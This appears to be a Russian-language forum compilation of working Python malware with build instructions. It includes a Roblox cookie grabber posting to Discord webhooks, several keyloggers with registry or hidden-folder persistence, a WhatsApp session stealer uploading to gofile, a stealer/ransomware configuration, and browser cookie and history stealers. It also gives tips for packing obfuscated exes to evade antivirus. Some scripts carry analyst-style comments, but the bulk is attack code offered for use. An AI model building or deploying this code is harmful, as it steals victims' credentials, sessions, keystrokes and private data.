    if not robloxpy.Utils.CheckCookie(cookie) == "This Is A Valid Cookie":

        return requests.post(url=webhook, data={"content":f"\n|| ```{cookie}``` ||"})


    # The response is parsed into `info`, which is not read again in this body.
    info = requests.get("https://www.roblox.com/mobileapi/userinfo",cookies={".ROBLOSECURITY":cookie}).json()


    # Embed-style message carrying the cookie value in a single field.
    requests.post(url=webhook, json={

        'username': "Sakura",

        'avatar_url': "https://cdn.discordapp.com/avatars/994230412383633480/1057a089f5141d9aac5848210c55212c.png?size=256",

        'embeds': [{

                "title": f"Sakura Grabber",

                "fields": [

                    {"name": ".ROBLOSECURITY", "value": f"```fix\n{cookie}```", "inline": True},

                ],

                "footer": {

                    ""

                }

            }

        ]

    }

)


# Runs at module level, before Sakura() is called further down: looks up the
# host's public IP address and posts it to the second webhook (`webhook1`).
# Analyst note: the two lookups below are network indicators when they come
# from a script host rather than a browser; the second one is plain HTTP, so
# the queried address is visible to on-path inspection.
hostname = socket.gethostname()  # assigned, but not read again in the visible part of this script

ip = requests.get('https://api.ipify.org/').text

r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')

geo = r.json()

embed = Embed()

# Only the address echoed back in the lookup response is reported.
fields = [

    {'name': 'IP Address', 'value': geo['query']},

]

for field in fields:

    if field['value']:

        embed.add_field(name=field['name'], value=field['value'], inline=True)

webhook1.send(embed=embed)


def Sakura():


    try:

        cookies = browser_cookie3.firefox(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Firefox')

    except:

        pass


    try:

        cookies = browser_cookie3.safari(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Safari')

    except:

        pass


    try:

        cookies = browser_cookie3.chromium(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Chromium')

    except:

        pass


    try:

        cookies = browser_cookie3.edge(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Microsoft Edge')

    except:

        pass


    try:

        cookies = browser_cookie3.opera_gx(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Opera GX')

    except:

        pass


    try:

        cookies = browser_cookie3.opera(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Opera')

    except:

        pass


    try:

        cookies = browser_cookie3.brave(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Brave')

    except:

        pass


    try:

        cookies = browser_cookie3.chrome(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                cookiecheckerandsend(cookie.value, platform='Chrome')

    except:

        pass


cookies = Sakura()


messagebox.showerror("Error", "Unable to install latest version.")

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe
Время отправки каждый час SEND_REPORT_EVERY = 3600

sudo apt install python3 && python3-pip
pip3 install keyboard discord_webhook pyinstaller
pyinstaller keylogger.py --onefile --noconsole


keylogger.py​


Python:
import keyboard,os
from threading import Timer
from datetime import datetime
from discord_webhook import DiscordWebhook, DiscordEmbed

SEND_REPORT_EVERY = TIME_IN_SECONDS_HERE
WEBHOOK = "WEBHOOK_URL_HERE"

class Keylogger:
    # Captures key-release events through the `keyboard` package, accumulates
    # them in self.log and sends the log to the WEBHOOK URL every `interval`
    # seconds (ATT&CK T1056.001 for the capture).
    #
    # Analyst note: host and network indicators visible in this class are a
    # short-lived %temp%\report.txt (written, uploaded, then removed when the
    # log exceeds 2000 characters) and periodic webhook requests spaced
    # `interval` seconds apart from a process with no console window (per the
    # build command quoted on this page).
    def __init__(self, interval, report_method="webhook"):
        now = datetime.now()
        self.interval = interval  # seconds between reports
        self.report_method = report_method  # only "webhook" is handled in report()
        self.log = ""  # keys captured since the last report
        # Both timestamps are set once here as formatted strings; end_dt is
        # not updated anywhere else in this class, so the time printed in a
        # report is the construction time, not the capture time.
        self.start_dt = now.strftime('%d/%m/%Y %H:%M')
        self.end_dt = now.strftime('%d/%m/%Y %H:%M')
        self.username = os.getlogin()  # included in every report title

    def callback(self, event):
        # Invoked by the keyboard hook for each key release; appends a text
        # form of the key to self.log.
        name = event.name
        if len(name) > 1:
            # Multi-character names are named keys, not printable characters.
            if name == "space":
                name = " "
            elif name == "enter":
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        self.log += name

    def report_to_webhook(self):
        # Sends self.log to WEBHOOK: as an attached report.txt when the log is
        # longer than 2000 characters, otherwise as an embed description.
        flag = False  # True when a temporary file was created and must be removed
        webhook = DiscordWebhook(url=WEBHOOK)
        if len(self.log) > 2000:
            flag = True
            path = os.environ["temp"] + "\\report.txt"
            with open(path, 'w+') as file:
                file.write(f"Keylogger Report From {self.username} Time: {self.end_dt}\n\n")
                file.write(self.log)
            with open(path, 'rb') as f:
                webhook.add_file(file=f.read(), filename='report.txt')
        else:
            embed = DiscordEmbed(title=f"Keylogger Report From ({self.username}) Time: {self.end_dt}", description=self.log)
            webhook.add_embed(embed)
        webhook.execute()
        if flag:
            os.remove(path)  # the on-disk copy exists only between the write above and this call

    def report(self):
        # Sends the current log if it is non-empty, clears it, and re-arms a
        # daemon Timer so this method runs again after self.interval seconds.
        if self.log:
            if self.report_method == "webhook":
                self.report_to_webhook()
        self.log = ""
        timer = Timer(interval=self.interval, function=self.report)
        timer.daemon = True
        timer.start()

    def start(self):
        # Registers the key-release hook, starts the report cycle and then
        # blocks in keyboard.wait().
        self.start_dt = datetime.now()  # replaces the formatted string set in __init__ with a datetime
        keyboard.on_release(callback=self.callback)
        self.report()
        keyboard.wait()
 
if __name__ == "__main__":
    keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="webhook")
    keylogger.start()

Python кейлогер отправляет нажатые клавиши через Discord Server, Webhook вставите в скрипт перед компиляцией в exe

sudo apt install python3 && python3-pip
pip3 install pynput discord_webhook pyinstaller
pyinstaller -F -w main.py

Флаги -F и -w означают, что программа будет упакована в один файл и работает в фоновом режиме (без окон).

main.py​


Python:
import pynput
from pynput.keyboard import Key, Listener
from discord_webhook import DiscordWebhook
import winreg
import sys

# Module-level configuration and logon persistence. Everything in this run
# executes when the script starts, before any key is captured.
webhook_url = '#'     # Destination of the captured text; '#' is the unconfigured placeholder
registry_name = 'Discord Webhook Keylogger'     # Value name written under the Run key below
keys_buffer = ''     # Captured keys that have not been sent yet

# Analyst note: persistence here is a Run-key value in the current user's hive
# (ATT&CK T1547.001). The value name is the literal above and the value data is
# sys.argv[0], i.e. the path the program was started with. Auditing writes to
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run, or reviewing autostart
# entries, surfaces it; deleting the value removes the autostart.
winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run")     # Create the Run key if it is missing
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)     # Open the key with write access
winreg.SetValueEx(registry_key, registry_name, 0, winreg.REG_SZ, sys.argv[0])     # Write the autostart value (REG_SZ)
winreg.CloseKey(registry_key)     # Release the handle

def send_message(message):
    DiscordWebhook(url=webhook_url, content=message).execute()     # Send message using Webhook

def on_press(key):     # Executes on each key pressed
    global keys_buffer
    if str(key)[:4] == 'Key.':     # Check if pressed key is not number, letter or character
        key = ' `[' + str(key) + ']`'
    else:
        key = str(key)[1]
    if len(keys_buffer) + len(key) >= 1975 or key == ' `[Key.enter]`':     # Check if keys_buffer exceeds Discord's 2000 characters per message limit or ENTER is pressed
        send_message(keys_buffer + key)     # Send logged keys on Discord channel
        keys_buffer = ''     # Reset keys_buffer to log new key presses
    else:
        keys_buffer += key     # Concatenate new logged key presses to make it look simpler

with Listener(on_press=on_press) as listener:
    listener.join()     # Start the listener


░██████╗░█████╗░████████╗░█████╗░███╗░░██╗██╗░░██╗██╗░░░░░░██████╗░██████╗░
██╔════╝██╔══██╗╚══██╔══╝██╔══██╗████╗░██║██║░██╔╝██║░░░░░██╔════╝░██╔══██╗
╚█████╗░███████║░░░██║░░░███████║██╔██╗██║█████═╝░██║░░░░░██║░░██╗░██████╔╝
░╚═══██╗██╔══██║░░░██║░░░██╔══██║██║╚████║██╔═██╗░██║░░░░░██║░░╚██╗██╔══██╗
██████╔╝██║░░██║░░░██║░░░██║░░██║██║░╚███║██║░╚██╗███████╗╚██████╔╝██║░░██║

SATANKLGR - Python Keylogger Вебка и скрины​



Функции инструмента для Windows всех версий:​

Нажатия клавиш
Веб-камера
Скриншоты
Постоянство


Преимущества:​

Совместим со всеми версиями Windows
Получение запутанного файла .exe для защиты от детектов
Слабо определяется антивирусами
Создание скрытой папки на диске C:\
Автоматическое удаление файлов после отправки на почту
Добавление в автозагрузку


Требования:​

Python https://www.python.org/downloads/release/python-311/



Применение:​

Скачать zip-архив, можете открывать, чистый Python код.

sudo apt install python3 && python3-pip
pip3 install -r requirements.txt


Запускаем установщик
python3 launcher.py

Скомпилировать startup.exe
pyinstaller --onefile startup.py


Когда запускаете скомпилированный файл startup.exe, он автоматически создает скрытую папку на диске C и перемещает SATANKLGR.exe в эту папку. Затем он запускает SATANKLGR.exe из папки, и программа появляется в диспетчере задач и работает здесь все время. После этого момента файл startup.exe не нужен. Впоследствии приложение будет постепенно добавлять снимки экрана и снимки с веб-камеры. После приложения отправит их на указанный адрес электронной почты.


Можно запустить SATANKLGR в Linux, однако вы получите только файл .py с исходным кодом.
После этого вы можете перейти в Windows и скомпилировать файл в .exe:

pyarmor pack --clean -e "--onefile --windowed --icon=NONE" SATANKLGR.py


Чтобы прервать сеанс кейлоггера, запустите terminate.bat

║║║╠═╣
╚╩╝╩ ╩
╔═╗┌┬┐┌─┐┌─┐┬ ┌─┐┬─┐
╚═╗ │ ├┤ ├─┤│ ├┤ ├┬┘
╚═╝ ┴ └─┘┴ ┴┴─┘└─┘┴└─



WhatsApp Stealer​


Stealer сессии WhatsApp на Python, программа крадет данные жертвы WhatsApp

Создайте полезную нагрузку (программа спросит вас, хотите ли вы составить полезную нагрузку)
Отправьте полезную нагрузку своей жертве и заставьте открыть

Полезная нагрузка сделает ZIP всех данных WhatsApp, расположенных по адресу LOCALAPPDATA\\Packages\\5319275A.WhatsAppDesktop_cv1g1gvanyjgm
Вам нужно будет зарегистрировать себе WebHook в Discord.
Идёт предварительно через https://api.gofile.io

sudo apt install python3 && python3-pip
pip3 install colorama requests pystyle dhooks pyinstaller
python3 main.py


main.py


Python:
from colorama import Fore
import time
import os
import shutil
import ctypes
import requests

from pystyle import Colors, Colorate, Write, Center, Box

os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW("WhatsApp Session Stealer | by xpierroz")

banner = """
        ╦ ╦╔═╗
        ║║║╠═╣
        ╚╩╝╩ ╩
╔═╗┌┬┐┌─┐┌─┐┬  ┌─┐┬─┐
╚═╗ │ ├┤ ├─┤│  ├┤ ├┬┘
╚═╝ ┴ └─┘┴ ┴┴─┘└─┘┴└─
"""

def _exit():
    print("\n")
    Write.Print(f"    .$ http://commudazrdyhbullltfdy222krfjhoqzizks5ejmocpft3ijtxq5khqd.onion/", Colors.yellow_to_red, interval=0.05)
    time.sleep(3)
    quit()

def _compile():
    print("\n")
    line = f'pyinstaller --onefile whatsapp.pyw'
    icox = Write.Input("    .$ Enter icon path (type N for none) -> ", Colors.green_to_blue, interval=0.025)
    if icox != "N":
        line += f"--icon={icox}"
 
    Write.Print(f"    .$ Compiling to exe ...", Colors.green_to_yellow, interval=0.05)
    os.system('echo off')
    print(Fore.BLACK)
    os.system(line)
    #os.system('cls')
    print(Colorate.Horizontal(Colors.rainbow, "    .$ Successfuly Compiled", 1))
    _exit()

def main():
    os.system("cls")
    print("\n") # Formatting stuff
    print(Colorate.Horizontal(Colors.green_to_blue, Center.XCenter(banner), 1))
    print(Colorate.Horizontal(Colors.green_to_blue, Box.Lines("made by github.com/xpierroz")))
    print("\n")
 
    wbh_url = Write.Input("    .$ Enter your WebHook url -> ", Colors.green_to_blue, interval=0.025)
    Write.Print(f"    .$ Fetching payload ...", Colors.green_to_yellow, interval=0.05)
    payload = requests.get("https://raw.githubusercontent.com/xpierroz/whatsappstealer/master/payload.py").text
 
    with open("whatsapp.pyw", "w") as f:
        f.write(payload.replace('WEBHOOK = "xpierroz on top"', f'WEBHOOK = "{wbh_url}"'))
 
    Write.Print(f"\n    .$ Payload fetched !", Colors.green_to_cyan, interval=0.05)
    compiling = Write.Input("\n    .$ Compile to exe [Y/N] -> ", Colors.green_to_blue, interval=0.025)
    if compiling == "Y":
        _compile()
    else:
        _exit()

 
main()

payload.py


Python:
import dhooks
import os
import requests
import time
import socket
import shutil

WEBHOOK = "xpierroz on top"
direct = f"{os.getenv('LOCALAPPDATA')}\\Packages\\5319275A.WhatsAppDesktop_cv1g1gvanyjgm"
print(direct)

def uploadToAnonfiles(path):
    # Uploads the file at `path` to gofile.io (the function name notwithstanding)
    # and returns the "downloadPage" value from the JSON response. Returns
    # False when all 10 attempts fail.
    #
    # Analyst note: each attempt makes two requests, one to
    # api.gofile.io/getServer and one multipart POST to
    # <server>.gofile.io/uploadFile. An upload to a file-sharing service from
    # a non-browser process is the network indicator to look for, and the
    # returned link is what the caller forwards to the webhook.
    for x in range(10):
        try:
            rr = requests.post(
                f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile',
                files={
                    "file": open(path, "rb")
                },
            ).json()["data"]["downloadPage"]
            return rr
        except Exception:
            # Any failure (network error, unexpected response shape, missing
            # file) is swallowed and retried after a 2-second pause.
            time.sleep(2)
    return False

# Script body: archive the directory in `direct` (the WhatsApp Desktop package
# folder under %LOCALAPPDATA%\Packages), upload the archive, delete it and post
# the host name plus the upload result to the webhook.
#
# Analyst note: host artefacts are the read of the whole package directory by
# a non-WhatsApp process and a transient ssouput.zip in the process's working
# directory. The page describes the archived folder as the WhatsApp session
# data, so on an affected host the desktop session should be treated as
# exposed and signed out from the account side.
try:
    shutil.make_archive("ssouput", "zip", direct)
except Exception:
    pass  # archive failures are ignored; the upload below is attempted regardless

m = uploadToAnonfiles(f"{os.getcwd()}\\ssouput.zip")  # download-page URL, or False
os.remove(f"{os.getcwd()}\\ssouput.zip")
dhooks.Webhook(WEBHOOK).send(f"```xpierroz WhatsApp Stealer - grabbed {socket.gethostname()} - {m}```")

KeyWatch - это Python кейлогер записывающий нажатия клавиш в системе Windows, работает в фоновом режиме, нажатые пользователем клавиши регистрирует в скрытой папке


Список функций:​

  • Скрытый файл журнала - хранится в скрытой папке, что делает его трудно обнаруживаемым
  • Название окна - получает заголовок активного окна в настоящее время и включает его в файл журнала для лучшего контекста
  • Время - записывает разницу во времени между каждым нажатием клавиши, чтобы обеспечить более точный журнал
  • Пользовательское представление ключей - заменяет специальные клавиши на пользовательские, читаемые для облегчения интерпретации
  • Автоматическое создание папок - автоматически создает скрытую папку для хранения файлов журналов
  • Фоновое выполнение - молча работает в фоновом режиме, не вмешиваясь в деятельность пользователей
  • Эффективный и легкий - разработан, чтобы оказать минимальное влияние на системные ресурсы


Применение:​

Чтобы использовать KeyWatch, выполните следующие шаги:

  • Запустите python keywatch.py
  • KeyLogger начнёт работать в фоновом режиме, захватывая клавишные и сохраняя их в файле журнала
  • Файл журнала хранится в скрытой папке, расположенной по адресу C:/ProgramData/Windows Security/

Использование:​

Убедитесь, что Python установлен https://www.python.org/downloads/ Обязательно "Add Python to PATH" при установке!
py -m pip install --upgrade pip
py -m pip install pywin32 keyboard
python keywatch.py


keywatch.py


Python:
#██╗░░██╗███████╗██╗░░░██╗░██╗░░░░░░░██╗░█████╗░████████╗░█████╗░██╗░░██╗
#██║░██╔╝██╔════╝╚██╗░██╔╝░██║░░██╗░░██║██╔══██╗╚══██╔══╝██╔══██╗██║░░██║
#█████═╝░█████╗░░░╚████╔╝░░╚██╗████╗██╔╝███████║░░░██║░░░██║░░╚═╝███████║
#██╔═██╗░██╔══╝░░░░╚██╔╝░░░░████╔═████║░██╔══██║░░░██║░░░██║░░██╗██╔══██║
#██║░╚██╗███████╗░░░██║░░░░░╚██╔╝░╚██╔╝░██║░░██║░░░██║░░░╚█████╔╝██║░░██║
#╚═╝░░╚═╝╚══════╝░░░╚═╝░░░░░░╚═╝░░░╚═╝░░╚═╝░░╚═╝░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝

import os
import datetime
from win32gui import GetForegroundWindow, GetWindowText
import keyboard
from win32con import FILE_ATTRIBUTE_HIDDEN, FILE_ATTRIBUTE_SYSTEM
from win32api import SetFileAttributes

# Log location. The directory is created under %ProgramData% with a name that
# imitates a Windows component, then marked hidden and system.
# Analyst note: the resulting host indicator is
# %ProgramData%\Windows Security\license.txt. Because both the HIDDEN and
# SYSTEM attributes are set on the folder, it is not listed by default
# directory views; `dir /a` or an attribute-aware triage tool shows it.
hidden_folder = os.path.join(os.environ['ProgramData'], 'Windows Security')
os.makedirs(hidden_folder, exist_ok=True)

attributes = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
SetFileAttributes(hidden_folder, attributes)

# The keystroke log itself; the attributes above are applied to the folder,
# not to this file.
log_file = os.path.join(hidden_folder, 'license.txt')

KEY_MAP = {
    " ": "[SPACE]",
    "space": "[SPACE]",
    "enter": "[ENTER]",
    "esc": "[ESC]",
    "ctrl": "[CTRL]",
    "alt": "[ALT]",
    "alt gr": "[ALT GR]",
    "tab": "[TAB]",
    "shift": "[SHIFT]",
    "maj": "[SHIFT]",
    "backspace": "[BACKSPACE]",
    "caps lock": "[CAPS LOCK]",
    "verr.maj": "[CAPS LOCK]",
    "up": "[UP]",
    "haut": "[UP]",
    "down": "[DOWN]",
    "bas": "[DOWN]",
    "left": "[LEFT]",
    "gauche": "[LEFT]",
    "right": "[RIGHT]",
    "droite": "[RIGHT]",
    "page up": "[PAGE UP]",
    "pg.suiv": "[PAGE UP]",
    "page down": "[PAGE DOWN]",
    "pg. prec": "[PAGE DOWN]",
    "home": "[HOME]",
    "end": "[END]",
    "fin": "[END]",
    "insert": "[INSERT]",
    "delete": "[DELETE]",
    "suppr": "[DELETE]",
    "windows gauche": "[LEFT WINDOWS]",
    "f1": "[F1]",
    "f2": "[F2]",
    "f3": "[F3]",
    "f4": "[F4]",
    "f5": "[F5]",
    "f6": "[F6]",
    "f7": "[F7]",
    "f8": "[F8]",
    "f9": "[F9]",
    "f10": "[F10]",
    "f11": "[F11]",
    "f12": "[F12]",
}

def get_window_title():
    hwnd = GetForegroundWindow()
    window_title = GetWindowText(hwnd)
    return window_title


def write_keys(keys_pressed, last_time, file):
    # Appends the pending key names to `file` and returns the timestamp of this
    # write, which the caller stores as the next `last_time`.
    #
    # keys_pressed: list of key strings; it is cleared after being written.
    # last_time:    datetime of the previous write, used for the pause marker.
    # file:         path of the log file, opened in append mode.
    #
    # Analyst note: the log written here has a recognisable shape, with
    # "[WINDOW TITLE] -> <title>" lines whenever the foreground window changes
    # and "(N s)" / "(N ms)" pause markers, which helps when searching a disk
    # image for the file or confirming what a recovered file is.
    with open(file, "a") as f:
        current_time = datetime.datetime.now()
        time_diff = (current_time - last_time).total_seconds()
        window_title = get_window_title()

        # The last seen title is kept as an attribute on the function object.
        if window_title != write_keys.last_window_title:
            f.write(f"\n[WINDOW TITLE] -> {window_title}\n")
            write_keys.last_window_title = window_title

        if time_diff >= 1:
            # Pauses of one second or more are annotated: milliseconds when
            # under two seconds, whole seconds otherwise.
            time_str = f"({int(time_diff)} s)"
            if time_diff < 2:
                time_str = f"({int(time_diff * 1000)} ms)"
            if keys_pressed:
                f.write(f"{time_str} {''.join(keys_pressed)} ")
                keys_pressed.clear()
        else:
            if keys_pressed:
                f.write(''.join(keys_pressed))
                keys_pressed.clear()

        f.flush()
        last_time = current_time

        return last_time

write_keys.last_window_title = ""

def on_press(event):
    try:
        keys_pressed = []
        if event.name in KEY_MAP:
            keys_pressed.append(KEY_MAP[event.name])
        elif event.name.isprintable():
            keys_pressed.append(event.name)
        global last_time
        last_time = write_keys(keys_pressed, last_time, log_file)
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    with open(log_file, "a") as f:
        f.write(
            f"\nLancement du script le {datetime.date.today()} à {datetime.datetime.now().strftime('%H:%M:%S')}\n"
        )

    last_time = datetime.datetime.now()
    window_title = get_window_title()
    write_keys.last_window_title = window_title

    on_press_event = on_press
    keyboard.on_press(on_press_event)
    keyboard.wait()

Angst Stealer​

Angst Stealer - это стилер Python, вымогатель, имеет в общей сложности 10 плагинов.


ПлагинОписание
ChromeChrome плагин дампит все пароли пользователей, веб-сайты и имена пользователей.
FilezillaЕсли установлена Filezilla, сделает дамп всего.
RansomwareШифрует все файлы на компьютере жертв, также бросает заметку.
DiscordDiscord token для Chrome and Discord.
Send_DiscordОтправляет все файлы через WebHook Discord.
Send_TelegramОтправляет все файлы через Telegram канал.
UserДанные о компе.
WindowsКлюч активации Windows.
CleanupОчищает все следы.
AntiVMПытается обнаружить, находится ли пользователь на виртуальной машине.


Установите Python https://www.python.org
Находясь внутри архива, откройте терминал.
Установите необходимые библиотеки с помощью pip
pip install pycryptodome==3.9.8 requests==2.31.0 pyinstaller==3.6 pyarmor==6.3.3 pywin32==301 colorama telebot

Внутри основного файла вы увидите шаблон конфигурации, измените его, чтобы он соответствовал вашим требованиям.

CONFIG = {

"webhook" : "", # ссылка на Webhook Discord, которую вы хотите использовать

"chrome" : True, # пароли Chrome

"filezilla"rue, # возможные сохраненные пароли Filezilla

"userdata"rue, # информация о своей жертве

"discord"rue, # украсть токены Discord

"send_discord": False, # опция для отправки в Webhook Discord

"send_telegram": True, # опция для отправки в телегу

"telegram_token": "", # токен для бота Telegram

"telegram_chat_id": "", # идентификатор чата Telegram

"ransomware" : {

"enabled" : False, # если установлено True, вы включили модуль вымогатель

"target_dir" : "C:\\Users\\", # каталог, в котором вы хотите, чтобы он шифровал

"extenstion" : ".angst", # расширения вымогателя, просто устанавливает расширение выходного файла

"btcAddy" : "", # биток

"email" : "charge@d0xbin.org" # связь

}

}

Запустите одну из следующих команд, перечисленных ниже, стоит отметить, что Pyarmor иногда повредит исполняемый файл, поэтому, если вы планируете использовать команду Pyarmor, вы должны проверить ее локально, чтобы убедиться, что он работает.

Python:
    pyinstaller --onefile --hidden-import=pkg_resources.py2_warn angst.py
    pyarmor pack -e " --onefile --hidden-import=pkg_resources.py2_warn" angst.py

Архив чистый, там 10 питон файлов, лень выкладывать в коде.

Cookie Stealer​

Можете свободно добавить другие браузеры, куда копировать куки.

cooker.py

Python:
import os

import shutil

import sqlite3

import win32crypt

def get_chrome_cookies():

    cookie_file = os.path.join(os.getenv('APPDATA'), r"..\Local\Google\Chrome\User Data\Default\Cookies")

    return cookie_file

def get_firefox_cookies():

    cookie_file = os.path.join(os.getenv('APPDATA'), r"Mozilla\Firefox\Profiles", os.listdir(os.path.join(os.getenv('APPDATA'), r"Mozilla\Firefox\Profiles"))[0], "cookies.sqlite")

    return cookie_file

def get_edge_cookies():

    cookie_file = os.path.join(os.getenv('LOCALAPPDATA'), r"Microsoft\Edge\User Data\Default\Cookies")

    return cookie_file

def copy_cookies(source_file, destination_path):
    # Copies one browser cookie database file into `destination_path`, keeping
    # the source file's base name, and prints the outcome. The file is copied
    # as-is; nothing in this function opens or decrypts it.
    #
    # Analyst note: the observable behaviour is a non-browser process reading
    # a browser profile's cookie store and writing a copy elsewhere (the
    # script below points the destination at a drive letter described as a USB
    # location). File-access auditing on browser profile directories and
    # removable-media write monitoring both cover this.

    destination_file = os.path.join(destination_path, os.path.basename(source_file))

  

    if os.path.exists(source_file):

        shutil.copy2(source_file, destination_file)

        print(f"Successfully copied cookies from {source_file} to {destination_file}")

    else:

        print(f"Unable to find cookies for {source_file}")

def copy_all_cookies(destination_path):

    browsers = [

        ("Google Chrome", get_chrome_cookies()),

        ("Mozilla Firefox", get_firefox_cookies()),

        ("Microsoft Edge", get_edge_cookies())

    ]

    for browser_name, cookie_file in browsers:

        copy_cookies(cookie_file, destination_path)

# Set the destination path to your desired USB location

destination_path = "E:\\CpCookies\\nazovpc"

copy_all_cookies(destination_path)

Chrome Stealer​

Стилер работает по хромам.

chrome.py

Python:
import os
import json
import sqlite3
import shutil
import zipfile

# Get the current username
username = os.getlogin()

# Construct the paths to the Chrome data files
bookmarks_path = f"C:/Users/{username}/AppData/Local/Google/Chrome/User Data/Default/Bookmarks"
history_db_path = f"C:/Users/{username}/AppData/Local/Google/Chrome/User Data/Default/History"

# Load the Bookmarks file
with open(bookmarks_path, encoding="utf-8") as file:
    bookmarks_data = json.load(file)

# Extract the URLs and names from the Bookmarks data
bookmarks = bookmarks_data["roots"]["bookmark_bar"]["children"]

# Create a text file for the bookmarks in the %temp% directory
temp_dir = os.environ["TEMP"]
bookmarks_file_path = os.path.join(temp_dir, "Chrome Bookmarks.txt")

# Write the bookmarks to the text file
with open(bookmarks_file_path, "w", encoding="utf-8") as file:
    for bookmark in bookmarks:
        url = bookmark["url"]
        name = bookmark["name"]
        file.write(f"Name: {name}\nURL: {url}\n\n")

print(f"Bookmarks saved to: {bookmarks_file_path}")

# Create a copy of the History database file
history_copy_path = os.path.join(temp_dir, "HistoryCopy")
shutil.copyfile(history_db_path, history_copy_path)

# Connect to the copied database
conn = sqlite3.connect(history_copy_path)
cursor = conn.cursor()

# Execute a query to fetch browsing history
cursor.execute("SELECT url, title FROM urls")

# Fetch all rows returned by the query
rows = cursor.fetchall()

# Create a text file for the browsing history in the %temp% directory
history_file_path = os.path.join(temp_dir, "Chrome History.txt")

# Write the browsing history to the text file
with open(history_file_path, "w", encoding="utf-8") as file:
    for row in rows:
        url = row[0]
        title = row[1]
        file.write(f"URL: {url}\n")
        file.write(f"Title: {title}\n")
        file.write("--------------------\n")

print(f"History saved to: {history_file_path}")

# Create a zip file and add the bookmarks and history text files to it
zip_file_path = os.path.join(temp_dir, "Chrome_Data.zip")
with zipfile.ZipFile(zip_file_path, "w") as zip_file:
    zip_file.write(bookmarks_file_path, "Chrome Bookmarks.txt")
    zip_file.write(history_file_path, "Chrome History.txt")

# Delete the temporary text files
os.remove(bookmarks_file_path)
os.remove(history_file_path)

print(f"Zip file created: {zip_file_path}")

Edge Stealer​

Стилер работает по Edge, ориентирован на историю посещения.

edge_history.py


Python:
import sqlite3
import tempfile
import zipfile
from pathlib import Path

def get_edge_history():
    # Returns the (url, title) rows from the `urls` table of the current
    # user's Edge History database, or an empty list when the file does not
    # exist or SQLite raises an error.
    #
    # Analyst note: the database is opened in place from the Default profile,
    # so the indicator is a non-browser process opening
    # ...\Microsoft\Edge\User Data\Default\History. The calling script then
    # writes edge_history.txt and Edge_Data.zip into the temp directory.
    history_file = Path.home() / 'AppData' / 'Local' / 'Microsoft' / 'Edge' / 'User Data' / 'Default' / 'History'
    if not history_file.exists():
        return []

    try:
        connection = sqlite3.connect(history_file)
        cursor = connection.cursor()
        cursor.execute("SELECT url, title FROM urls")
        results = cursor.fetchall()
        connection.close()
        return results
    except sqlite3.Error as error:
        # The error is discarded; callers cannot tell "no history" from a
        # failed read.
        return []

edge_history = get_edge_history()

# Get the path to the temporary directory
temp_dir = tempfile.gettempdir()

# Create the file path for edge_history.txt in the temporary directory
edge_file = Path(temp_dir) / "edge_history.txt"

if edge_history:
    with open(edge_file, "w", encoding="utf-8") as file:
        file.write("Edge History:\n")
        for url, title in edge_history:
            file.write(f"URL: {url}\n")
            file.write(f"Title: {title}\n\n")

    # Create the path for the ZIP archive
    zip_file = Path(temp_dir) / "Edge_Data.zip"

    # Create a ZIP archive and add the edge_history.txt file to it
    with zipfile.ZipFile(zip_file, "w") as zipf:
        zipf.write(edge_file, "edge_history.txt")

    # Delete the edge_history.txt file
    edge_file.unlink()

else:
    output_file = Path(temp_dir) / "browser_history.txt"

    with open(output_file, "w", encoding="utf-8") as file:
        file.write("Microsoft Edge is not found/used on this PC.")

Limbo​


Limbo - это мощный вредоносная программа, который можно использовать для сбора различных типов информации с компьютера пользователя.


В частности способен на:​

Сбор сохраненных паролей из Google Chrome
Запись истории поиска
Сбор нажатых клавиш
Сбор данных о компьютере пользователя, включая ОЗУ, ОС, ЦП и ГПУ
Поиск публичного IP-адреса пользователя и информации об этом

Установите Python https://www.python.org
Чтобы использовать, нужно будет установить несколько библиотек Python:

pip install wmi
pip install psutil
pip install requests
pip install pypiwin32
pip install pynput
pip install pymongo
pip install pycryptodome


После, нужно подключить базу данных MongoDB https://www.mongodb.com/
cluster = MongoClient() # Ваша база данных здесь



Применение:​

python limbo.py


limbo.py​


Python:
import os
import sys
import wmi
import json
import base64
import socket
import psutil
import requests
import platform
import win32crypt
from Cryptodome.Cipher import AES
import sqlite3
import shutil
import subprocess
from pynput import keyboard
from pynput.keyboard import Key
from pymongo import MongoClient
from datetime import timezone, datetime, timedelta

cluster = MongoClient() #your database here

#copy file for autostart
def copy_to_startup():
    # Copies this script file into the current user's Startup folder unless a
    # file with the same name is already there, and prints which case applied.
    #
    # Analyst note: this is Startup-folder persistence (ATT&CK T1547.001). The
    # indicator is a script file appearing under
    # %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    # with the same base name as the running script; removing that copy
    # removes the autostart.
    current_path = os.path.realpath(__file__)
    current_file = os.path.basename(current_path)
